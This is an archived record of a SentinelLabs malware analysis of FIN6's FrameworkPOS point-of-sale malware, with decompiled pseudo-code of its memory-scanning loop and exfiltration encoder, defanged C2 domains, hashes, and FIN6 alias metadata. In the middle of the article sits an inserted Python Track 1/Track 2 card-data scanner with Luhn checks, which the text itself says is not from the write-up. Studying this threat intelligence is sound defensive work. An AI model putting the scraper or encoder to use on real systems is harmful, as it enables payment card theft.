{
	"id": "4dbd82ed-3bc3-48e9-a4ef-a280adf806d8",
	"created_at": "2026-04-06T00:06:54.288974Z",
	"updated_at": "2026-04-10T03:33:53.622356Z",
	"deleted_at": null,
	"sha1_hash": "7b57dcbbbc8fd9042c154707f790fdc61be01e07",
	"title": "FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis \u0026 Internals - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3733205,
	"plain_text": "FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis \u0026\r\nInternals - SentinelLabs\r\nBy Vitali Kremez\r\nPublished: 2019-09-19 · Archived: 2026-04-05 18:36:42 UTC\r\nVitali Kremez dives into FIN6 “FrameworkPOS”, a family that targets payment card data on Point-of-Sale (POS) and\r\neCommerce systems.\r\nPoint-of-Sale (POS) malware remains an active threat in financial cybercrime. POS malware targets the systems\r\nthat run physical point-of-sale devices and operates by inspecting process memory for data that matches the\r\nstructure of payment card data (Track 1 and Track 2 data), such as the account number, expiration date, and other\r\ninformation stored on a card’s magnetic stripe. Some of the most prolific recent POS malware families include\r\n“AlinaPOS”, “GlitchPOS”, and “FrameworkPOS”.\r\nAfter a card is swiped, the primary account number (PAN) and the accompanying track data\r\nsit in the point-of-sale system’s memory unencrypted while the system determines where to send them for\r\nauthorization. During that window, the point-of-sale malware reads the process memory searching for elements\r\nthat look like card data.\r\nThe FrameworkPOS malware and related variants are linked to high-profile merchant breaches of the past,\r\nincluding the “MozartPOS” variant involved in the Home Depot intrusion.\r\nPOS malware becomes especially relevant during the Fall shopping season (in particular Black Friday), when it targets\r\nbusinesses handling live credit card transactions.\r\nFull video episode: Dissecting FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis \u0026\r\nInternals\r\n“FrameworkPOS” Malware Internals\r\nOne of the more interesting POS malware families is “FrameworkPOS” and its variants (including the ones dubbed\r\n“GratefulPOS” and “MozartPOS”). 
This malware was most recently internally named “psemonitor_x64.dll.”\r\nFrameworkPOS, also known as TRINITY, was previously linked to the financially motivated hacking collective\r\ncalled FIN6.\r\nSome of the newly spotted FIN6 FrameworkPOS malware variants reveal that the group utilizes a 64-bit\r\nmalware variant with two export functions, “workerIntstance” and “debugPoint”.\r\nhttps://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/\r\nPage 1 of 6\n\nNotably, FrameworkPOS malware appears to continue to have a low detection ratio according to the detections\r\ndisplayed on VirusTotal (as of September 18, 2019, only 9 out of 66 antivirus engines treat the malware as\r\nsuspicious).\r\nFor malware analysis purposes, we also analyze an earlier FrameworkPOS version that carries the purported “grp1”\r\ncampaign identifier and contains debug Track 2 data, presumably for testing purposes.\r\nThe FrameworkPOS main function flow is shown below as pseudo-code in C++: it creates the “caller” thread, which\r\nbuilds out the communication protocol and resolves the necessary host information, and then loops over the running\r\nprocesses to scan their memory.\r\nThe excerpt of the main malware functionality is as follows (comments added for readability; caller,\r\ncheck_virtualQuery_ex and scan_memoryfor_card are the analyst's labels):\r\nCreateThread(0, 0, (LPTHREAD_START_ROUTINE)caller, 0, 0, 0); // C2 setup and host-info resolution run in a separate thread\r\nwhile ( 1 )\r\n{\r\n  time(\u0026v11);                                   // start time of this scan pass\r\n  hSnapshot = CreateToolhelp32Snapshot(2u, 0);   // 2 = TH32CS_SNAPPROCESS: snapshot of all processes\r\n  if ( hSnapshot == (HANDLE)-1 )                 // INVALID_HANDLE_VALUE\r\n    return 0;\r\n  pe.dwSize = 296;                               // sizeof(PROCESSENTRY32) on 32-bit Windows\r\n  if ( !Process32First(hSnapshot, \u0026pe) )\r\n    break;\r\n  do\r\n  {\r\n    v8 = 0;\r\n    // skip-list: 20 hardcoded process names (24-byte entries starting with wininit.exe) plus a substring match\r\n    for ( j = 0; j \u003c 0x14; ++j )\r\n    {\r\n      if ( !strcmp(pe.szExeFile, \u0026aWininit_exe[24 * j]) || strstr(byte_592010, pe.szExeFile) )\r\n      {\r\n        v8 = 1;                                  // blacklisted: do not scan this process\r\n        break;\r\n      }\r\n    }\r\n    if ( !v8 )\r\n    {\r\n      if ( pe.th32ProcessID )                    // skip PID 0 (System Idle Process)\r\n      {\r\n        dwProcessId = pe.th32ProcessID;\r\n        v14 = 1;\r\n        dword_592514 = 0;\r\n        byte_59136B = 0;\r\n        v89 = 
check_virtualQuery_ex(pe.th32ProcessID, 1); // walk the target's regions (VirtualQueryEx) into an allocated buffer\r\n        if ( v89 )\r\n        {\r\n          scan_memoryfor_card((int)v89);         // Track 1/Track 2 pattern match plus Luhn check\r\n          free((int)v89);\r\n          _sleep(200u);                          // short pause between processes\r\n        }\r\n      }\r\n    }\r\n  }\r\n  while ( Process32Next(hSnapshot, \u0026pe) );\r\n  if ( dword_592410 \u003e 0 )\r\n    _sleep(10000u);                              // 10 s back-off before the next pass\r\n  CloseHandle(hSnapshot);\r\n  time(\u0026v15);\r\n  v15 -= v11;                                    // elapsed time of this scan pass\r\n  localtime(\u0026v15);\r\n}\r\nBefore scraping memory, the malware skips blacklisted processes such as “wininit.exe” in order to speed up the\r\ncard-scan logic.\r\nCredit Card Scraping Logic \u0026 Luhn Algorithm\r\nThe malware also validates the card information by running the Luhn algorithm on any purported track data that\r\ndoes not begin with the digits “4” (VISA), “5” (Mastercard), “6” (Discover), “34” (AMEX), “37” (AMEX), “36”\r\n(Diner’s Club), or “300-305” (Diner’s Club).\r\nThe x64 malware version also contains an altered, “greedier” version of the Track1/Track2 scanner logic that focuses\r\nless on static card prefixes and service codes and instead accepts any data that looks like Track1/Track2.\r\nFrameworkPOS Data Encoding: XOR \u0026 Obfuscation\r\nThroughout its execution, the malware builds some notable strings by XORing each byte of a section in a loop,\r\n*(\u0026byte_memory++) ^= 0x4D (implemented as a sequence of mov, xor, shl, movsx, and shl instructions). 
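As an added example (not code from the SentinelLabs write-up and not FrameworkPOS's own code), the Python scanner below reproduces the card-matching logic described in the scraping section above: it searches a raw memory buffer for Track 1 and Track 2 records (ISO 7813 layout: Track 2 is PAN '=' YYMM service-code discretionary-data '?', Track 1 is '%B' PAN '^' name '^' YYMM service-code ... '?'), validates every candidate PAN with the Luhn algorithm, and in strict mode also requires one of the issuer prefixes listed above, while a greedy mode mirrors the x64 variant that accepts anything that looks like track data. The constructed sample buffer, the standard test PANs, the skip-list entries other than wininit.exe, and the strict/greedy split (Luhn applied to every candidate) are assumptions of this example, not findings of the analysis.

```python
# Added example, not code from the SentinelLabs write-up or from FrameworkPOS: a Track 1 / Track 2
# scanner with Luhn validation, run over a constructed memory buffer.
import re

# Processes a scraper skips before reading memory. wininit.exe is named in the write-up;
# the other entries are assumptions for this example.
SKIP_PROCESSES = {'wininit.exe', 'csrss.exe', 'smss.exe', 'lsass.exe'}

# Issuer prefixes listed in the write-up (VISA, Mastercard, Discover, AMEX, Diners Club).
ISSUER_PREFIXES = ('4', '5', '6', '34', '37', '36',
                   '300', '301', '302', '303', '304', '305')

# Track 2 (ISO 7813): [;] PAN(13-19 digits) '=' YYMM, 3-digit service code, discretionary data [?]
TRACK2_RE = re.compile('[;]?([0-9]{13,19})=([0-9]{4})([0-9]{3})([0-9]*)[?]?')
# Track 1: '%B' PAN '^' cardholder name '^' YYMM, service code, discretionary data '?'
CARET = re.escape('^')   # escaped caret so it is matched literally, not as an anchor
TRACK1_RE = re.compile('%B([0-9]{13,19})' + CARET + '([A-Z0-9 /.-]{2,26})' + CARET
                       + '([0-9]{4})([0-9]{3})([^?]*)[?]')


def should_scan(process_name):
    '''Mirror of the skip-list check in the main loop: False for blacklisted processes.'''
    return process_name.lower() not in SKIP_PROCESSES


def luhn_ok(pan):
    '''Luhn mod-10 check over a string of ASCII digits.'''
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ord(ch) - 48
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def has_issuer_prefix(pan):
    return pan.startswith(ISSUER_PREFIXES)


def accept(pan, greedy):
    '''Strict mode: known issuer prefix and Luhn-valid. Greedy mode (x64-style): Luhn-valid only.'''
    if not luhn_ok(pan):
        return False
    return greedy or has_issuer_prefix(pan)


def scan_buffer(buf, greedy=False):
    '''Return card candidates found in a raw memory buffer, ordered by offset.'''
    text = buf.decode('latin-1')     # 1:1 byte-to-char mapping keeps offsets meaningful
    hits = []
    for m in TRACK2_RE.finditer(text):
        pan = m.group(1)
        if accept(pan, greedy):
            hits.append({'track': 2, 'pan': pan, 'expiry': m.group(2),
                         'service': m.group(3), 'offset': m.start()})
    for m in TRACK1_RE.finditer(text):
        pan = m.group(1)
        if accept(pan, greedy):
            hits.append({'track': 1, 'pan': pan, 'name': m.group(2), 'expiry': m.group(3),
                         'service': m.group(4), 'offset': m.start()})
    return sorted(hits, key=lambda h: h['offset'])


# Constructed sample memory: two valid records, one Luhn failure, one Luhn-valid PAN with an
# unknown issuer prefix. The PANs are standard test numbers, not real cards.
NUL = bytes(2)
SAMPLE_MEMORY = (b'GARBAGE' + NUL
                 + b';4111111111111111=25121011234567890?' + NUL
                 + b'%B5500000000000004^DOE/JOHN^2611101123456?' + NUL
                 + b';4111111111111112=25121011234?' + NUL      # fails Luhn
                 + b';7000000000000005=24051011234?' + NUL)     # Luhn-valid, unknown prefix


if __name__ == '__main__':
    for mode in (False, True):
        label = 'greedy' if mode else 'strict'
        for hit in scan_buffer(SAMPLE_MEMORY, greedy=mode):
            print(label, hit)
```

Run against the sample, strict mode returns the VISA Track 2 record and the Mastercard Track 1 record only; greedy mode additionally returns the Luhn-valid PAN with the unknown prefix 7, which is the extra noise (and extra coverage) the write-up attributes to the x64 variant. Feeding a real process dump into scan_buffer is a quick way to confirm whether cleartext track data is present in a POS process at all, which is the precondition this family depends on.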
Oftentimes, malware coders\r\nbuild such strings at runtime to bypass static anti-virus detection.\r\nNotably, the FrameworkPOS malware obfuscates its stolen data by first mapping each character through a hardcoded\r\nsubstitution table, then XORing each byte with the key 0xAA, and finally converting each byte into two hexadecimal\r\ncharacters with an _snprintf API call, as follows (comments added for readability):\r\nsize_t __cdecl enc_func(char *a1, int a2)      // a1: input string, transformed in place; a2: output buffer for the hex text\r\n{\r\n  size_t result;\r\n  unsigned int i;\r\n  for ( len_enc = 0; ; ++len_enc )\r\n  {\r\n    result = strlen(a1);\r\n    if ( len_enc \u003e= result )\r\n      break;\r\n    // substitution: byte_42E000[] is the 69-entry source alphabet, byte_42E048[] the replacement alphabet\r\n    for ( i = 0; i \u003c 69; ++i )\r\n    {\r\n      if ( (unsigned __int8)a1[len_enc] == byte_42E000[i] )\r\n      {\r\n        a1[len_enc] = byte_42E048[i];\r\n        break;\r\n      }\r\n    }\r\n    a1[len_enc] ^= AA_key;                       // single-byte XOR with 0xAA\r\n    _snprintf((char *)(a2 + 2 * len_enc), 2u, \"%.2x\", (unsigned __int8)a1[len_enc]); // two hex characters per byte\r\n  }\r\n  return result;\r\n}\r\nThe XOR key is referenced at the following locations:\r\nAddress           Function\r\n----------------  ------------------\r\n.text:004030DB    notice_write_func\r\n.text:00403847    memory_parser\r\n.text:00403873    memory_parser\r\n.text:004039DE    memory_parser\r\n.text:00406C43    computer_name_gen\r\nCommand \u0026 Control (C2) Protocol\r\nNotably, this FrameworkPOS variant exfiltrates the 0xAA-XORed, hex-encoded data over the domain name system (DNS),\r\ncarrying it in the “ping” request of its DNS exfiltration protocol.\r\nCredit: @malz_intel\r\nIndicators of Compromise (IOCs):\r\nFrameworkPOS x86:\r\nSHA-256: 81cea9fe7cfe36e9f0f53489411ec10ddd5780dc1813ab19d26d2b7724ff3b38\r\nFrameworkPOS x64:\r\nSHA-256: 7a207137e7b234e680116aa071f049c8472e4fb5990a38dab264d0a4cde126df\r\nC2:\r\nns[.]akamai1811[.]com\r\nns[.]a193-45-3-47-deploy-akamaitechnologies[.]com\r\nSource: https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/"
	],
	"report_names": [
		"fin6-frameworkpos-point-of-sale-malware-analysis-internals-2"
	],
	"threat_actors": [
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434014,
	"ts_updated_at": 1775792033,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7b57dcbbbc8fd9042c154707f790fdc61be01e07.pdf",
		"text": "https://archive.orkl.eu/7b57dcbbbc8fd9042c154707f790fdc61be01e07.txt",
		"img": "https://archive.orkl.eu/7b57dcbbbc8fd9042c154707f790fdc61be01e07.jpg"
	}
}